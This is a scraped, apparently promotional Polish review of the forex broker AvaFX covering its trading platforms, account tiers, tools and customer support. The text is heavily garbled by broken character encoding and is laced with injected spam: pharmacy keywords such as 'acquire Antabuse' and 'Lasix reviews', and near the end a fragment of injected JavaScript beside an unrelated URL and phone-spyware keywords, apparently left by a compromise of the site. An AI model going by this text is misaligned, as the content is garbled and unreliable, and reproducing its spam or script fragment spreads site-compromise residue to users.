Recenzja AvaFX - forexbrokerzy.pl
 • Recenzja

  Recenzja

  PoniewaA? AvaFx obraca miesiA�cznie ponad 1,5 miliardami nie ma wA�tpliwoA�ci, iA? AvaFx jest jednA� z wiodA�cych platform poA�redniczA�cych obecnie transakcjami walutowymi w Internecie. JednakA?e, co wyrA?A?nia AvaFx od innych poA�rednikA?w transakcji walutowych jest nie tylko wielkoA�A� jej miesiA�cznych obrotA?w, ale takA?e intuicyjny interfejs uA?ytkownika, ktA?ry zaspokoi potrzeby zarA?wno profesjonalnych finansistA?w, jak i brokerA?w rynkA?w walutowych (Forex). TestowaliA�my platformA� transakcyjnA�, obsA�uge klienta, A�atwoA�A� uA?ytkowania i inne elementy AvaFx, a nasze wnioski przedstawiamy poniA?ej.

  acquire Antabuse

  Platforma transakcyjna

  generic lioresal

  Podstawowa platforma transakcyjna uA?ywana przez AvaFx nazywa siA� Ava Trader i daje uA?ytkownikom moA?liwoA�A� zawierania transakcji walutowych (Fx) szybko, korzystajA�c z rozpowszechnionej i popularnej platformy Meta Trader 4. AvaFx oferuje rA?wnieA? interaktywnA� platformA� transakcyjnA�, ktA?rA� sprytnie nazwano Ava Java.
  Rachunki rzeczywiste na AvaFx mogA� byA� kategoryzowane pod konta Silver z minimalnym depozytem 100 $, Gold z minimalnym depozytem 1,000 $, oraz Platinum z minimalnym depozytem 10,000 $. Konto demo ma wszystkie cechy, ktA?re znajdziesz na rzeczywistej platformie Ava i oferuje wspaniaA�e wprowadzenie w temat.
  ChociaA? AvaFx nie oferuje obecnie platformy Meta Trader 5, nie odczuliA�my jakiegoA� wiA�kszego braku, poniewaA? platforma Meta Trader 4 A�wietnie siA� sprawdza i w wygodny sposA?b zapewnia wszystkie potrzebne informacje do przeprowadzania transakcji walutowych (Forex). ByliA�my jednak zadowoleni, gdy odkryliA�my, A?e AvaFx oferuje takA?e mobilnA� platformA� transakcyjnA� z niesamowicie szczegA?A�owym wyjaA�nieniem jak jej uA?ywaA�, a takA?e bezpoA�rednimi linkami do platform obsA�ugujA�cych inwestorA?w rA?A?nych walut.
  Poza standardowymi transakcjami interaktywnymi, AvaFx oferuje mobilnA� platformA� transakcyjnA�, ktA?ra wspiera wszystkie wiA�ksze mobilne platformy. PiA�kno tych mobilnych inwestycji polega na ich interaktywnoA�ci; nie jest teA? obsA�ugiwana przez A?adnA� aplikacjA� co umoA?liwia integracjA� z praktycznie kaA?dym mobilnym urzA�dzeniem, by umoA?liwiA� handel na rynkach walutowych w kaA?dym momencie i wszA�dzie.
  Wreszcie AvaFx oferuje opcjA� autotrader o nazwie Ava Autotrader, ktA?rej recenzje przeprowadziliA�my osobno, abyA�cie sami mogli zdecydowaA� czy opcja autotrade jest dla was wA�aA�ciwa.

  Opcje

  AvaFx oferuje szeroki zakres opcji wA�A�czajA�c peA�ne stawki streaming aA? do bieA?A�cego naleA?nego kursu wymiany 24 godziny na dobA� i szeroki zakres swapA?w walutowych. JednakA?e, w czasie naszego testu platformy AvaFx byliA�my rA?wnieA? pod wraA?eniem opcji, ktA?re nie sA� dostA�pne na AvaFx, takich jak: koszt rolowania pozycji czy opA�ata za wezwanie do uzupeA�nienia depozytu

  (margin call fee) , ktA?rych to wydatkA?w w ogA?le nam nie brakowaA�o.

  Na AvaFx dostA�pne sA� dobre, A�atwe w uA?yciu narzA�dzia. NiektA?re z zawartych w AvaFx nar,zA�dzi do tworzenia wykresA?w to: Trend Lines, Fibo Retracement, Horizontal Lines i Vertical Lines itd. ChociaA? te narzA�dzia mogA� nie byA� wystarczajA�ce dla prawdziwie zawodowych graczy sA� one wiA�cej niA? wystarczajA�ce dla dla nowych inwestorA?w i mogA� naprawdA� poprawiA� jakoA�A� transakcji.
  DoceniliA�my rA?wnieA? fakt, iA? transakcje sA� wykonywane przy jednym klikniA�ciu jako egzekucja rynkowa , a przy dwA?ch jako transakcja rynkowa. Ponadto przydatny jest teA? firmowy Uaktualniony Kalendarz Ekonomiczny i profesjonalne analizy umieszczone na stronie, ktA?re umoA?liwiajA� podejmowanie systematycznych i racjonalnych decyzji transakcyjnych.
  Wreszcie, jesteA�my zachwyceni tym, A?e AvaFx oferuje bonusy i specjalne oferty dla poczA�tkujA�cych graczy, takie jak: obniA?ona stawka minimalnego depozytu, specjalne bonusy korzystajA�ce z okreA�lonych metod pA�atniczych albo gotA?wka dodawana do twojego konta na pierwszy depozyt.

  ObsA�uga klienta

  AvaFx oferuje rA?A?norodne formy obsA�ugi klienta wA�A�czajA�c wsparcie e-mailowe, pomoc telefonicznA� i czat na A?ywo. Naszym zdaniem ich pomoc telefoniczna zasA�ugujA� na najwyA?szA� uwagA�- podczas gdy raz zostaliA�my poproszeni o czekanie ponad 5 minut reszta naszych pytaA� zadanych przez telefon byA�o wyjaA�nionych niezwykle szybko. Jest warte zanotowania, iA? inaczej niA? w pozostaA�ych platformach poA�redniczA�cych transakcjami walutowymi, AvaFx oferuje pojedynczy numer do dziaA�u obsA�ugi klienta zarejestrowany w Stanach Zjednoczonych, wiA�c gracze dzwoniA�cy z zagranicy muszA� wykonaA� miA�dzynarodowe poA�A�czenie, by uzyskaA� pomoc o wysokim standardzie. Nie zmienia to faktu, iA? pod tym numerem dostA�pna jest wielojA�zyczna obsA�uga, wiA�c gracze nieanglojA�zyczni nie muszA� siA� obawiaA�, iA? pozostanA� bez pomocy.
  Niestety, w czasie naszego testu platformy AvaFx odkryliA�my, A?e system czatu jest znacznie mniej niezawodny niA? pomoc telefoniczna. ZainicjowaliA�my osiem rA?A?nych czatA?w z firmA�, a na odpowiedA? musieliA�my czekaA� doA�A� sA�ugo, czasem nawet 12 minut. PomijajA�c czekanie przekonaliA�my siA�, A?e obsA�uga czatu AvaFx jest zasobna w wiedzA� i przyjazna. I tak jak pomoc telefoniczna takA?e wsparcie poprzez czat jest dostepne w prawie kaA?dym jA�zyku.

  KontaktujA�c siA� z AvaFx poprzez system e-mailowy musieliA�my czekaA� na odpowiedA? 17 godzin i 55 minut, ale gdy juA? rozpoczA�liA�my dialog byliA�my bardzo zadowoleni widzA�c, A?e zaA�oga AvaFx odpowiadaA�a juA? znacznie szybciej.
  W koA�cu warto wspomnieA�, A?e AvaFx oferuje bardzo przydatne tutoriale i rozbudowane centrum edukacyjne, ktA?re umoA?liwia szybkie i niezaleA?ne znalezienie odpowiedzi na pytania przez samych uA?ytkownikA?w. ChociaA? zawarte informacje sA� wiA�cej niA? wystarczajA�ce brakuje opcji szukaj na stronie, ktA?ra znacznie uA�atwiA�aby proces uzyskania pomocy.

  A?atwoA�A� uzytkowania

  Lasix reviews

  Za wszystkich platform poA�redniczA�cych i zawierajA�cych transakcje walutowe AvaFx jest jednA� z najA�atwiejszych w uA?yciu. Cecha wyrA?A?niajA�cA� AvaFx od innych tego typu stron jest fakt, A?e oferuje ona jasno oznaczony przewodnik, ktA?ry stanowi wideo i audio, zrozumiale objaA�niajA�ce jak korzystaA� ze strony. Gracze, ktA?rzy nie chcA� korzystaA� z przewodnika mogA� odbyA� wirtualnA� podrA?A? po stronie, gdzie mogA� wybieraA� tematy tutoriali wedA�ug wA�asnego uznania.

  Nawet pobieA?ne oglA�dziny platformy AvaFx powinny zadowoliA� uA?ytkownikA?w. Inaczej niA? na innych platformach typu Forex, takich jak Markets.com czy eToro, strona gA�A?wna jest przejrzysta i A�atwa do nawigowania, co sprawia, A?e goA�cie mogA� siA� A�atwo w niej rozeznaA�. RA?wnie godne podziwu sA� firmowe platformy transakcyjne , ktA?re sA� jasno wyznaczone i nieskomplikowane. Sprawia to, A?e zarA?wno nowi gracze jak i eksperci w handlu walutowym mogA� A�atwo zorganizowaA� swoje myA�li.

  ChociaA? Forex jest relatywnie skomplikowanA� dziedzinA� przemysA�u, AvaFx w naszej opinii niezwykle mocno stara siA� organizowaA� i upraszczaA� swojA� stronA� i narzA�dzia jednoczeA�nie zapewniajA�c najnowsze technologie i analizy w taki sposA?b, by wszyscy gracze mogli w peA�ni cieszyA� siA� inwestowaniem.

  http://www.colegiosanpedro.cl/?p=9940 }d.getElementsByTagName(‘head’)[0].appendChild(s); Business plan cell spyware, how to spy on iphone, spyware on iphone

Leave a Reply


No comments yet. Be the first!

Nauka


Ranking

© ForexBrokerzy.pl wszystkie prawa zastrzeżone 2011-2012
Zrzeczenie si? odpowiedzialno?ci: ForexBrokerzy.pl nie ponosi odpowiedzialno?ci za jakiekolwiek straty lub szkody wynikaj?ce z polegania na informacji zawartych na tej witrynie. Handel walutami, nie jest odpowiedni dla wszystkich inwestorw. Przed podj?ciem decyzji o handlu Forex lub innym instrumentem finansowym nale?y starannie rozwa?y? swoje cele inwestycji, poziom do?wiadczenia i apetytu na ryzyko.